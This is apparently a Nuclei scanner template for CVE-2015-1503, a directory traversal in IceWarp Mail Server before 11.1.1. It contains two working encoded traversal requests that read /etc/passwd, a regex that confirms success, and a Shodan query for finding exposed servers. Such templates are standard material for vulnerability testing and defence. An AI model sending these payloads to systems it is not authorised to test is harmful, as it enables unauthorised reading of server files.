39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: CVE-2015-1503
|
|
|
|
info:
|
|
name: IceWarp Mail Server <11.1.1 - Directory Traversal
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
|
|
- http://www.icewarp.com
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1503
|
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-1503
|
|
cwe-id: CWE-200
|
|
metadata:
|
|
max-request: 2
|
|
shodan-query: title:"icewarp"
|
|
tags: lfi,mail,packetstorm,cve,cve2015,icewarp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
|
|
- "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|